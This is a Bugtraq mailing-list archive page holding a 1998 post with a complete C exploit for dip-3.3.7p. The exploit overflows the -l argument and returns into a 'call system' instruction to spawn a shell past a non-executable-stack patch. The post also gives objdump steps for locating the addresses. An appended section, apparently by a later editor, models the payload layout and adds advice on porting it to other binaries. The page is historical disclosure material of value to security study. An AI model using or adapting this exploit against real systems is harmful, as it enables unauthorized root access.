Bugtraq mailing list archives
dip-3.3.7p exploit (stackpatch)
From: tstroege () CIP INFORMATIK UNI-ERLANGEN DE (Thomas Troeger)
Date: Fri, 26 Jun 1998 17:46:53 +0200
Hi,

While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes:

------------------- sammeltonne.c -------------------
/*
 * Program to get a shell from dip-3.3.7p on a system with
 * Solar Designer's stackpatch installed.
 * by tstroege () cip informatik uni-erlangen de
 *
 * Of course this is just for educational purposes too :)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SOMETEXT 0x0804cee5      /* address of text system call */
#define CMDSTR   0x08054f0e      /* address where command string should be */
#define DIP      "/usr/sbin/dip" /* path of dip */

int main(int argc, char *argv[])
{
    char mem[256], *ptr;
    /* mem is handed to dip as the argument of -l; it is too long on purpose */
    char *name[] = { DIP, "-k", "-l", mem, (char *)0 };
    /* bytes that end up over the saved return address: the address of a
     * "call system" in dip's text, then the address of the string system()
     * should get. The trailing 0 is what terminates the strcpy() below. */
    int i, code[] = { SOMETEXT, CMDSTR, 0 };
    int off = 117;      /* distance from the start of mem to the saved return address */

    if (argc > 1)
        off = atoi(argv[1]);

    /* fill the buffer with junk ... */
    for (ptr = mem, i = 0; i < 256; i++)
        *ptr++ = 'a';

    /* ... and copy the two addresses byte-wise (little-endian) to offset off */
    ptr = mem + off;
    strcpy(ptr, (char *)&(code[0]));
    mem[255] = 0;

    execve(name[0], name, 0);
    perror("execve");   /* only reached if dip could not be started */
    return 1;
}
-----------------------------------------------

SOMETEXT: address in text segment where system is called.
CMDSTR: address in text segment where a suitable command string is stored (dip is nice enough to have a /bin/sh string in its code).

Both addresses will be different on your system, so here is a way to find them out:

...
objdump --disassemble-all /usr/sbin/dip
...

Now search for the following pattern:

...
0804ced4  pushl  %ebx
0804ced5  pushl  $0x8054848
0804ceda  pushl  $0x6
0804cedc  call   08049678
0804cee1  addl   $0xc,%esp
0804cee4  pushl  %ebx
-->0804cee5  call   080493c8        SOMETEXT
0804ceea  addl   $0x4,%esp
0804ceed  testl  %eax,%eax
0804ceef  jne    0804cf9e
0804cef5  pushl  %esi
0804cef6  movl   0x8(%ebp),%eax
0804cef9  movl   0x660(%eax),%eax
0804ceff  pushl  %eax
...
0804eefd  leal   0xfffffc00(%ebp),%eax
0804ef03  pushl  %eax
0804ef04  pushl  $0x8054f08
0804ef09  pushl  $0x8054f0b
0804ef0e  pushl  $0x8054f0e        <-- CMDSTR
0804ef13  call   08049368
0804ef18  pushl  $0x7f
0804ef1a  call   08049768
0804ef1f  nop
...

tst.
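The following is an added example, written by the editor and not part of Thomas Troeger's post, that models the two things the exploit above relies on so they can be checked on any host without dip, a 32-bit build or a non-randomized layout: how the strcpy() over (char *)&code[0] serializes the two addresses (and why an address containing a 0x00 byte could not be delivered that way), and why the word directly after the overwritten return address becomes the argument of system() when control returns to a "call system" instruction instead of to system() itself, which is what lets the payload skip the fake return address a classic return-into-libc chain needs. The SOMETEXT, CMDSTR and 0x080493c8 values are the ones quoted in the post; the stack model, offsets and every other value are constructed for illustration and do not come from dip.

```c
/*
 * Added example, not from the original post. Models the payload layout of
 * sammeltonne.c and the i386 stack around the overwritten return address.
 * Addresses taken from the post: SOMETEXT, CMDSTR and the call target
 * 0x080493c8. Everything else is constructed for illustration.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SOMETEXT 0x0804cee5u   /* "call system" site quoted in the post */
#define CMDSTR   0x08054f0eu   /* "/bin/sh" address quoted in the post */
#define BUFLEN   256

/* 1 if any of the four bytes of v is zero: strcpy() stops at the first NUL,
 * so such an address cannot be copied into the buffer this way. */
int has_nul_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Build the same buffer as the post: 'a' padding, callsite and cmdstr
 * little-endian at offset off, terminating NUL at the end. Returns the number
 * of address bytes written (8), or 0 if the layout does not fit or an address
 * contains a NUL byte. */
size_t build_payload(unsigned char *out, size_t off, uint32_t callsite, uint32_t cmdstr)
{
    if (off + 8 >= BUFLEN || has_nul_byte(callsite) || has_nul_byte(cmdstr))
        return 0;
    memset(out, 'a', BUFLEN);
    for (int i = 0; i < 4; i++) {
        out[off + i]     = (unsigned char)(callsite >> (8 * i));
        out[off + 4 + i] = (unsigned char)(cmdstr >> (8 * i));
    }
    out[BUFLEN - 1] = 0;
    return 8;
}

/* The post's own serialization for comparison: on a little-endian host it
 * produces exactly the bytes build_payload() writes. Returns strlen(out). */
size_t serialize_like_post(unsigned char *out, uint32_t callsite, uint32_t cmdstr)
{
    uint32_t code[] = { callsite, cmdstr, 0 };   /* trailing 0 = strcpy terminator */
    strcpy((char *)out, (const char *)&code[0]);
    return strlen((char *)out);
}

/* Minimal model of the i386 stack: stack[] holds 32-bit words, a higher index
 * is a higher address, sp indexes the word at %esp. */
struct cpu { uint32_t stack[16]; int sp; uint32_t eip; };

static void do_ret(struct cpu *c)                                   /* pop %eip */
{ c->eip = c->stack[c->sp]; c->sp++; }

static void do_call(struct cpu *c, uint32_t target, uint32_t ret_addr) /* push, jump */
{ c->sp--; c->stack[c->sp] = ret_addr; c->eip = target; }

static uint32_t first_arg(const struct cpu *c)     /* cdecl: first argument at 4(%esp) */
{ return c->stack[c->sp + 1]; }

/* Return into the "call system" instruction: the overwritten return address is
 * followed directly by the string pointer, because the call instruction itself
 * pushes the return address that system() expects below its argument. */
uint32_t arg_via_callsite(uint32_t callsite, uint32_t cmdstr, uint32_t system_addr)
{
    struct cpu c = { {0}, 8, 0 };
    c.stack[8] = callsite;   /* slot that held the saved %eip */
    c.stack[9] = cmdstr;     /* the next word up the stack */
    do_ret(&c);              /* %eip = callsite, %esp now at stack[9] */
    do_call(&c, system_addr, callsite + 5);   /* "call rel32" is 5 bytes long */
    return first_arg(&c);
}

/* Classic return-into-libc for comparison: returning straight to system()
 * needs a fake return address between the function address and the argument. */
uint32_t arg_via_system_direct(uint32_t system_addr, uint32_t fake_ret, uint32_t cmdstr)
{
    struct cpu c = { {0}, 8, 0 };
    c.stack[8]  = system_addr;
    c.stack[9]  = fake_ret;
    c.stack[10] = cmdstr;
    do_ret(&c);              /* %eip = system, %esp at stack[9] = fake_ret */
    return first_arg(&c);
}

int main(void)
{
    unsigned char buf[BUFLEN];
    printf("address bytes written at offset 117: %zu\n",
           build_payload(buf, 117, SOMETEXT, CMDSTR));
    printf("system() argument via call site: %#x\n",
           arg_via_callsite(SOMETEXT, CMDSTR, 0x080493c8u));
    printf("0x08000000 deliverable by strcpy? %s\n",
           has_nul_byte(0x08000000u) ? "no (contains NUL)" : "yes");
    return 0;
}
```

The NUL check is the caveat worth remembering when porting this to another binary: the post's two addresses happen to contain no zero byte, so strcpy() carries all eight bytes and the 0 in code[] only acts as the terminator; a call site or string located at an address with a 0x00 byte would have to be delivered by a different copying bug.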
Current thread:
- Bug is sudo?, (continued)
- Bug is sudo? Rhodie (Jun 25)
- Re: Bug is sudo? Warner Losh (Jun 26)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)
- Re: security hole in mailx Theo de Raadt (Jun 25)
- guestbook script is still vulnerable under apache Stunt Pope (Jun 25)
- Re: guestbook script is still vulnerable under apache Theo Van Dinter (Jun 25)
- Re: guestbook script is still vulnerable under apache Andru Luvisi (Jun 25)
- Re: guestbook script is still vulnerable under apache Lincoln Stein (Jun 26)
- dip-3.3.7p exploit (stackpatch) Thomas Troeger (Jun 26)
- And another qpopper overflow (does this make 3?) Aaron D. Gifford (Jun 28)
- Re: dip-3.3.7p exploit (stackpatch) M.C.Mar (Jun 28)
- WIPO Bill Aleph One (Jun 25)
- Re: guestbook script is still vulnerable under apache Dean Gaudet (Jun 25)
- Re: guestbook script is still vulnerable under apache Lars Eilebrecht (Jun 25)
- Re: guestbook script is still vulnerable under apache Andrew Clegg (Jun 26)
- Re: security hole in mailx Seth McGann (Jun 25)